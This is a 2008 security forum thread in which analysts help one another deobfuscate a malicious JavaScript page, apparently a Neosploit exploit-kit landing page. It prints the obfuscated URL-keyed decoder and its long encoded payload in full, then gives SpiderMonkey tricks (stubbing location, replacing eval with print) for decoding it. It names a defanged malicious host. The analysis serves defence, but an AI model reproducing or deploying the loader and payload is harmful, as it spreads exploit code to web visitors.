Author Topic: JavaScript Deobfuscation Question


July 11, 2008, 05:39:28 am

cjeremy

Can anyone help me with a little guidance on how exactly you get around the "location.href" in order to decode obfuscated JavaScript?  Here is an example of what I am trying to deobfuscate (an actual script):

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<script type="text/javascript">

<!--

// Decoder stub. Derives an 8-byte key from a CRC-32 of (this function's own
// source text + location.href), uses it to decode the hex payload passed as the
// first argument, and eval()s the result. The second parameter (b08o6M2Qh) is
// never read.
//
// Key derivation, step by step:
//   1. arguments.callee.toString() + location.href; every non-word character
//      is stripped (/\W/g) and the remainder upper-cased.
//   2. CRC-32 of that string: table built from the reflected polynomial
//      0xEDB88320 (3988292384), initial value 0xFFFFFFFF, final XOR with
//      0xFFFFFFFF, rendered as 8 upper-case hex digits, zero-padded on the left.
//   3. The 8 key bytes are the ASCII codes of those 8 hex digits.
//   4. Each 2-hex-digit pair of the payload becomes (byte - key[i mod 8]) mod 256
//      and is appended as one character.
//   5. eval() of the decoded string. eval is captured into a local at function
//      entry, so re-binding the global eval before the call is honoured. If the
//      eval throws, window.location = "/" is attempted; any error from that
//      (e.g. no window object in a shell) is swallowed by the empty catch.
//
// Analyst notes:
//   - Because location.href is hashed into the key, the payload decodes only
//     when location.href is byte-for-byte the URL the page was served from
//     (scheme, host, path and query). Anything else yields garbage, the eval
//     fails, and the "/" redirect path is taken.
//   - Because the function's own source is hashed too, changing any identifier
//     or literal inside it changes the key — substituting a literal URL for
//     `location.href` inside the function is enough to break the decode. Define
//     `location` outside the function instead and leave this line untouched.
//     Whitespace is removed by /\W/g, so reformatting alone does not alter the
//     key, but on engines whose Function.prototype.toString() returns the
//     exact source text a comment placed inside the body would.
//   - NOTE(review): an engine whose toString() normalises or decompiles the
//     function body (rather than returning the source verbatim) would produce
//     a different key; confirm this on the engine used for analysis.
function wOd3DlOah(g06cS78wT, b08o6M2Qh){var tiHq264Bk = eval;var F2s6tCwSu = arguments.callee;var oeXd5l4i4 = location.href;F2s6tCwSu = F2s6tCwSu.toString();F2s6tCwSu = F2s6tCwSu + oeXd5l4i4;var lG4qP1k5L = F2s6tCwSu.replace(/\W/g, "");lG4qP1k5L = lG4qP1k5L.toUpperCase();var Q7XLR2g46 = 4294967296;var TRQ2SlFOK = new Array;for(var iyWyibo1P = 0; iyWyibo1P < 256; iyWyibo1P++) {TRQ2SlFOK[iyWyibo1P] = 0;}var x08pg60t7 = 1;for(var iyWyibo1P = 128; iyWyibo1P; iyWyibo1P >>= 1) {x08pg60t7 = x08pg60t7 >>> 1 ^ (x08pg60t7 & 1 ? 3988292384 : 0);for(var f7t6uA52T = 0; f7t6uA52T < 256; f7t6uA52T += iyWyibo1P * 2) {var Th782eo73 = iyWyibo1P + f7t6uA52T;TRQ2SlFOK[Th782eo73] = TRQ2SlFOK[f7t6uA52T] ^ x08pg60t7;if (TRQ2SlFOK[Th782eo73] < 0) {TRQ2SlFOK[Th782eo73] += Q7XLR2g46;}}}var x6nN1E856 = Q7XLR2g46 - 1;for(var vg6be4P48 = 0; vg6be4P48 < lG4qP1k5L.length; vg6be4P48++) {var s4Xb2YK6J = (x6nN1E856 ^ lG4qP1k5L.charCodeAt(vg6be4P48)) & 255;x6nN1E856 = (x6nN1E856 >>> 8) ^ TRQ2SlFOK[s4Xb2YK6J];}x6nN1E856 = x6nN1E856 ^ (Q7XLR2g46 - 1);if (x6nN1E856 < 0) {x6nN1E856 += Q7XLR2g46;}x6nN1E856 = x6nN1E856.toString(16).toUpperCase();while(x6nN1E856.length < 8) {x6nN1E856 = "0" + x6nN1E856;}var Rm3sHDrL7 = new Array;for(var iyWyibo1P = 0; iyWyibo1P < 8; iyWyibo1P++) {Rm3sHDrL7[iyWyibo1P] = x6nN1E856.charCodeAt(iyWyibo1P);}var pn2vHu2ni = "";var Ca5B5W3A2 = 0;for(var iyWyibo1P = 0; iyWyibo1P < g06cS78wT.length; iyWyibo1P += 2){var Th782eo73 = g06cS78wT.substr(iyWyibo1P, 2);var clDsnj045 = parseInt(Th782eo73, 16);var Oc86UChGH = clDsnj045 - Rm3sHDrL7[Ca5B5W3A2];if(Oc86UChGH < 0) {Oc86UChGH = Oc86UChGH + 256;}pn2vHu2ni += String.fromCharCode(Oc86UChGH);if(Ca5B5W3A2 + 1 == Rm3sHDrL7.length) {Ca5B5W3A2 = 0;} else {Ca5B5W3A2++;}}var rAoH46ngd = 0;try {tiHq264Bk(pn2vHu2ni);} catch(e) {rAoH46ngd = 1;}try {if (rAoH46ngd) {window.location = "/";}} catch(e) {}}

//-->

</script>

</head>

<body onload="wOd3DlOah('9BB8b397a8a0A69f5585a7A6AD83698066936D84766A8665A09cabAC60579FA580977d8B6C8C865AB0b9a6a6549b67a6659B79AB82ac576e55A8BB95a072AD92A7638dAA9F817a9c8388B854715798a39cb8b299A2abaa5f98A4B1a0999c72A796B565A068a69D64817377655474579Da4A6a6A89Da6A55F9db5AA9A6F7fad9C7F86b08279AA576e558BBB9F7e7aA27f7AB673a8A38aABA39Eb1AC5c5d727FA7a08D889F827cAA5172638daa9f817a9C8388b8545f57A365a4a978806469686CABA4b754868d89787a9a7885A15774517Db9B07e77a28576a871b799A4a398949A6B74908B669e5d5565675D6f898D837c889c6785A4576e55959B867B7c8E6486b073A8A38CA7A19ab58895a79c5F5a70B9a6a654ad6d79a196A79C7c6e576e5577776D68706D68677c7b6Faa98A951a5759c8D7C786a628C638254A29CAE5176B5b795ad729DA0A76bBB95A6579B9d82AD9C7577807B517263756F549ba37E9F9a86777d7B576D55757A6a6f579b9d82AD9C7577807b5c606C65afA4698e8a7d8478658b929B9D82ad9c7577807B8E558065646FB4AD92a7638d6C6bb0B0a167957d547157686c9bB2B75Caa98a95199af929e8B787a7A7963825465696f6C55a7B1819E8E78747e87805498a3849b8C84887d7857756f7263765D54b27f696cbcbea466896F5172638d6c6bb0B0A167957d54727575516663A3545C7F6f68AEbcb566866F575755746573546A70696D757e66676f6b516F63755D6f9dA6a35DB9a6A654a39C938e89b87D6778576E55738054A09C998A7bB68e677557735167787b6f54A39c938e89B87d6778575C7263A9a081a18E72788C89545e57695a55BEBB95a65780a57d857b64809A81517263A9a081a18E72788c89545f57A396979c8ba77D6a786Ca5759C8D7C786a628C9E8eA87C796D6181A68f91547457a1679A9e7c756a688890AFAA968d7DAA7A6884a25492577F696cBCBEa466896f6C9ea9655ca4698e8a7D8478658B9280a57D857b64809A818E557f65645D57B2a1679A9e7C756A6888908Cb97c766d677D988da2545f7457A76b8bb187969F7F6870c0c2B1AA98a951818c75a86c7E90948A638254AA6D7f9D88A5ad7c6b576451667EabA3a65fAD92a763AC82958a83658086B2547157676C55aa939587836b7c78B0657054898D837C889C6785a4659D9AB1acA89C72579883a4988068827A9e606e6e54afAD98a355b97cAD978ba0AAA7856571545f837A65B77D7B8d9a8C519363978A867E7C886894b262979f98A378b2a99975AB5f9883A4988068827a9E5e6C655a54696C66708F8E64a86f7e8A98986571545f837a65B77D7b8D9a8C51738183546C60578F55B3778B8D7f7864669aA0AA6bb09a859EBCb77
69172b47d7E73b96c7B909A86558065807D67AB697C9cA88954955759ab798da087999f796c6372546560729a9B636d807D67ab697C9Ca889547357615e63c0807d67ab697C9ca88954627451AB798Da087999F796c7EC2807d67ab697c9CA8895474577D7E73B96c7B909A8663b7B487A8a9a09F9C6B766a5d65aba08aB3B599a67a98A49A6B6e6fab9Fa09D9A6B917d64AB6F788ea69A62A09CA598A9ab6570546f6051B08F8E64a86F7e8A9898657154596753556e65807d67AB697c9ca8896fB4AD92a763B967A56dAC76659098547157a596AC6386A6A698b06C9Bb2B75caa98a95199AF929e8B787a7A7963825464725795A190af8b757a8075557F656c6f579B9d82ad9c7577807B5C606c65afA86AA867AA88758187929B9d82ad9c7577807B8e558065807d67AB697C9cA889629A9F92a786B4989978ab5999af929e8b787a7A796c80B1AA98a951AD99796688b083768c638254565972a796b5659E68AF8D689Ab0B7995474576170a9b4A65cAD98a355A7B1819e8e78747e8765715467725199AF929e8b787A7a7963815484796a8069AE9E9aAC65a396a3AAb99c6F579b9D82AD9C7577807B51608065665db2ad92a7638EA87c796D6181A68F54715787736892799F8D9Daf5fa8b8a7a7A8A95F95A190af8B757a80756163775D6fAD98A355ABb97E806b82647C8d657154a798a3A8A88EA2A85F80A57d857b64809A815d55747B5d6FAD98a3558D78777DA9687e81736571549fAB7B817790677B81575E55B778A56aac7c618296A09e68AF8d689Ab0B7999172A0975d8d78777Da9687E8173657054676051B08D78777Da9687e8173657154816A747EB576818067575c55757a6a6fb4AF87697599AD807c8E5160806587a8A9A09f9C71abA6A3a47A9996B588a3989C5f7b68868Ea6658483615E7EAE9A5cA16BA98B7aaaa1a69C575c557465717157AB64A679BA7964848A5Fa1a8b39BA89f6051b0AD79ac8a6E9c9Ea7a86571546772ae55A8b1A79957b29B69BB9b6B99A4A996606e80b1b1AD98a3559777a185a07b6866b56571546772A5a7bc65AF9867ac618d77bc82a95faf87697599ad807C8e5A70C0659795AB9a995da86e54AF8B699E86AC896B65A9576E557480b1a8a9B051B0ACAB545c8B699e86AC896b65A96051b0BAAEA298a6ae5fa1b2a895a8a0a69F55806556635972AEb263a895A89a9F599A6c65afB1b4417397B5BE80668668815D6a7E69766C7069767Aa767956D986277847A9A757a6e6A6E747e65966C6d676D887E6A6A6d6E636a757C6B6B7a6b616a737e69766c7069767AA767756D786297A47A9A6D6a6d936cA77E696C9A6f686E737D646a6d6e636a757c6B6b7a6B616A737e69966c7069967A8767756d786297a47a9a96677877767c866
9757C70656d7a7D756a6d6E636A757C6b6b9A6B616A737879696770766E7b7b6a6A706C657684a664957078726E898676959D78686c777d6a6C6f7863967C7C976C6c709276897a956a6d996168897a64687c6a9577867e66966F6C666D79876c956A6d946e878675969C78766Ba77A676899986A767a86676a6d6f966d7A7E966c6C706a6cA87c7a95986C666B897B6A959d706597A67E95757b706776798769966A6D62967Aa665966D6F636Ea5a768766798666ea67E6a966F78696E85a769959D6d766a767896969A706796777b6a969870666e777E696b9B6F696D747E6C6a686e616B797A796b6E6B6368868777756978666B797e66767d6f626D78876c6d6B6E696D7b7A656C6a6C666A777c6A6b696C666D74787969676B6368a687789570709497757e6a6a7C6c757685A66C6C7d70686C877D686D6c6f686a757D676A686f946e857D6a6C9870936BA47e68956C6d6276897e9a7578707276847e69756e6C736b7B7B776D706f666A777c666a687874967b7c9A75786d746d787E696d6a6c766C7a7A956a9d6c666A767d676a686d616c7a7A756a6D996168a97a646898986a967A86676A6D6f6a6b787C6d956D6f6A6d7a7d64969B6c666ba97b6A6D986F696E857c69959a6d756d73a6956a7D706776887e66966F6E6796797B99767870666E777E696b7B6F696d747e6c6A7A6D676bA97b77696a6A9768897a646898709476867a656A7c6F6A6b787C6D956d6F6a6d7A7d64767B6c666b897D676A686c666c7A7a676A7D6b636886799a6898706597A97C986d7078686d787d966C6a6c646D767A656a6f6D666b777B6c6b9A6B616a737875959978629678a6966a68707476867a656a9C6F6a6B787C6D956d6f6a6d7A7D64969b6C666bA97d676A686C666c7B7a676A9D6B6368a6799A6878706597a97C786d7098686d787d966C6a6c646D767A656a6f6d666b787b6c6b9A6b616A73787595997862767886766A68709476867A656A7C6F6a6B787c6D756D6F6A6D7a7D64969B6C666bA97d676a686c666c7C7a676a9d6b6368a6797A6878706597A97c986D7078686D787D766C6A6c646d767a656a6f6d666b797b6c6b9a6b616a73787575797862967886766a68707476867A656A7C6F6A6B787C6d956d6F6A6D7a7d64767B6c666b897d676A686C666ca47A676a9d6B6368a6797A6878706597A97C986d7098686D787D966c6A6C646D767a656A6F6D666b7a7B6c6B7a6b616A73789575797862967886766a68709496a67A656a9c6F6a6b787c6D756d6F6A6d7a7d64767b6C666B897D676a686c666cA57a676A9D6b636886799a6898706597a97c786d7078686d787d766C6a6C646d767A656a6F6D666B7B7b6c6b7A6B616A737875959998629678a6966A68707496A67a6
56a7c6f6a6B787c6D956d6f6A6D7A7d64767B6c666BA97d676A686C666c867a676a9d6B636886797a6878706597A97C786d7078686d787d966C6a6c646d767a656A6F6D666B7C7B6c6B7a6B616a73789969676a966E85a6976A686c93967aA6956d696F6976777E6d6C6D6e666B797A666C6a6c666A777C6a6b696C666ba9787969676A966885866c966A7069967A7e976C686b636886a867689C6A756A767876959d70736a757b99756978746e757D68766F6F696C7A7D6c6a686E616D767a656a6f6d666b767b6C6a686C6a6BA67a656d9D6F726D7a7D95956e6D936e777e696b6B707676738675956d78736E787E6b6A9c6C686D778676959B7069967Aa66895996c666C78A66b959D706896A97E69956E986a6e7A7b6C6a9B6C646c797A756A6d6C676Ba97b6A6a9c6D656Ba9789969676A966E76877a6c7b6F67777b7d686c796e686A757D676A686C666C797b6d6A6F6e6168A97A64687c6a956a767876767a706776777b6A766F70676E897c9a6B7098956C7a86776a686E616B797e9a756E98936Ea5867875699868777886676B6b786996a5876D766C706997767c98756E98646E7cA7967569709276857a7a967078726e77A76d966c98666ba87b656B696C666B767c6A6a786d766a767876767A706776777b6A6c6e6f686e7aA669766a70656d7A7D796a686e616B797A676a6f6E6168897a64689c6a956a767876959A786576777B79966E7065777B7a656C7898936C7C7c6D6d6a6F616e7a7D6A6C6a6D666Ba77D95966e6E926C7c7d676D6A6F676d7A7D66766F70676E897C9a6b7098956C7Aa6976a9D709776857e9A959b786A6EA47D656c6c786A6D877B686d6f6F636D767E966A7a6C966b897A6597686B636886797a6D6970756E7b7d6C6d7D70777678A7956a686e616b79a66C95706f966D737C6d76706E6976867A7A957070756E76876C6C6b786396A47e6A6C6E786a6a847D75966e6E726C7c7d676D6A6F676d7a7B7A6a7d986877787D68969878686eA5a768956F6C736C7A7B6B6A7d6E6168897a64687c6a7569897E95757A6C666a847E6B75796F666E877d757667786976797B6a6B7B6C646C7b7a95696A6A9768a5799A6c6E6f686e7a8669766a70656D7a7d996a686C766d767A656a6f6D666A777D65689C6A956A767896687D6e736D797e6B966C986176787D6A6c7c6C666aa77d676A686f6597737d676D9B6F966E86a76D766c6D766a767896976a6B6368867a676879989276887E75766970726Aa47D776d6C6f6577847e79956C6F926CA47c68757B706997777e6C969870756a757d666a686D666c797A75696a6A7768A57d776D6c6f6597a47E99756C6f926ca47B6a6a7a6e616B797a676b6D6d666a777d65689c6A956A767896696a6a97767Ba66
b966a6C646EA4A667756F6D966d7Ca79a967098946b797b796A6d706796a57e666d6B98666e7c7C6a6C6F6c666a877b6a6c6E6F686E7a8669766A70656d7a7d996B7A6b616A73866B956E98686a75a7656b6D70656E757c986B6f6f636ca97B6A6b7c6c6496A48664957078726e89a696959D78686c777E68966F70926e76A795956D6E6977757E6A766A70927673A7956A706C66977C7E68966F7096967587756a6a6C946d747879696798616B7aa66b6c9B6E976c7b7c996d6A6D649678A696966c6e6597a48669966F70766E778776966C70696b887a6796989896767586766A6a6C976b797A677678709296A487756b677095767aa66b956e98696e78A76C7578786497a47a676a9D6E6168a97A64757A6D69967A7C786D696D686Ca97E676A9D986796A586696c6E986a9679876C9598706697A5a66995996C956a77876D766A70676B7B7A986a6d6c686EA48775766C78646D737B646b6c70946E77876c7569706877877a9A757078656E897C69756b707296a97A79956F707676737c699598986276847e6A767c6D646e78867875786E63967c7B6a6B7B706A6b7C7C976B6870656c797B666b6d6D666E7B7C6A6b6e6D646c797b656B9B6D946e7A7c6A956d70686c857B6D6b6D6D736b7A7c6A6B6A6D666C7C7e6875786d936b757C6c6B7070686C797b7595996d956B797C6b756e706a6b7b7a656b686C666D79876c956a6D746E87A695969c78766A857D65689c6A9596a4a664757078726EA9A696757D78686C777E67766C706a96A57c687569986497797e6a766B706A6C7886799598707796a47a6d96686D726E767E666c9b6D666E767c796A9D6e6168897a64969C6B616a736C5D6F')">



</body>

</html>




Ok so let me explain what I usually do to deobfuscate stuff like this.  I grab the file, remove all the HTML references to leave just the JavaScript portions, and then I change the "eval" or "document.write" to a "print" command.  Then I save the file and use SpiderMonkey to execute the script from the command line like this: js -f myfile.

This works for a lot of the scripts I try to deobfuscate, but the "location.href" always gives me an error as it is not defined in JavaScript.  So I thought I would just replace the "location.href" with the domain name and file path, but this doesn't work either as I get jumbled-up output.  So can someone point me in the right direction on how to get around this issue?  Many thanks in advance to anyone who can.

Also Bobby, if you're reading this, I would even be open to pointers on using Malzilla to do this, but I have to admit that since I moved to a Mac as my main working computer I don't use it as often as I used to....  But I still like your tool, and if it will help me with scripts like this I will definitely open a VM to run Malzilla in. 


July 11, 2008, 07:42:34 am
Reply #1

bobby

It isn't such a big problem to get this working.
First, location is a DOM object, and href is a property of location, so you can't define them as plain variables.

Put this at the beginning of JavaScript code:
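// Minimal stand-in for the DOM `location` object, for running the script in a
// standalone shell (e.g. SpiderMonkey's `js`) where no DOM exists.
// `href` must be the exact URL the page was served from (scheme, host, path
// and query), because the decoder above hashes location.href into its key.
function my_location() {
  this.href = "http://www.something.com";
}

// Declared with `var` rather than assigned as an implicit global so the stub
// also works under strict mode; in a sloppy top-level script it is still a
// global, which is what the decoder's `location.href` read resolves to.
var location = new my_location();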
This way you define an object (Location), give it an href property, and make an instance of the object.
The same way you can define document properties (cookies etc.).

Lately I have had problems with more complicated scripts that use createElement, getElementById etc., and these can't be implemented in an easy way.

By the way, do you have GCC on your Mac? I can send you the code of the hacked SpiderMonkey (that I use in Malzilla), so you won't need to replace eval() anymore. It writes a temp file at every eval() call, so you can see what it does.

July 11, 2008, 08:09:27 am
Reply #2

cjeremy

Hey that worked like a charm thanks again.  Just can't believe it was that simple.  ;)

Yes, I have GCC on my Mac, and if you would like to send me that code that would be outstanding.... Thanks again for all the help, and thanks in advance for the hacked SpiderMonkey code. 

--jeremy

July 11, 2008, 08:24:11 am
Reply #3

bobby

First take a look here:
http://blog.didierstevens.com/2007/08/07/a-second-spidermonkey-trick/

That is the hack I based my hack on.
Didier uses hacks for both eval() and document.write(), so that would probably be more suitable for your needs.
I use just the eval() hack, modified to write to a subfolder.
I guess you will use Didier's original hack, but if you still want my version, I will upload it for you.
You can apply Didier's hack to newer SpiderMonkeys without a problem.

July 11, 2008, 11:57:53 am
Reply #4

sowhat-x

...lol, wouldn't it be better if this was asked in the public section,
so that other people out there could learn a few tricks as well?  :)

July 11, 2008, 03:18:45 pm
Reply #5

cjeremy

Damn sowhat-x, you're making sense again....  Yeah, you can move it to public if you would like, as I forgot about the private/public stuff. 

Thanks Bobby for all the information; I will look into Didier's hack...  Thanks again guys!

August 04, 2008, 06:47:24 pm
Reply #6

realdeal

Hi,

Those can be a real pain. If you want to decode it in SpiderMonkey, try putting this (below) at the top of your input file:

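// Change the location.href value to wherever you got the neosploit page.
// The decoder hashes location.href into its decoding key, so this must be the
// exact URL the page was served from (scheme, host, path and query). The
// 'hxxp' spelling below is defanged for the forum post; the real scheme has to
// be restored before running, or the derived key will not match and the
// output will be garbage.
var location = { href: 'hxxp://cyzmvif.com/cgi-bin/index.cgi?dx' };

// Keep a reference to the real eval under real_eval, then re-bind eval to the
// shell's print so the decoded payload is written out instead of executed.
// The decoder copies eval into a local at entry, so this re-binding only takes
// effect if it happens before the decoder is called.
var real_eval = eval;
eval = print;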

// Followed by the code to compile
function wOd3DlOah(g06cS78wT, b08o6M2Qh){var tiHq264Bk = eval ...
wOd3DlOah('9BB8b397a8a0A69f5585a7A6AD83698066936D84766A8665A0 ...

// Then in your konsole # js inputfile > outputfile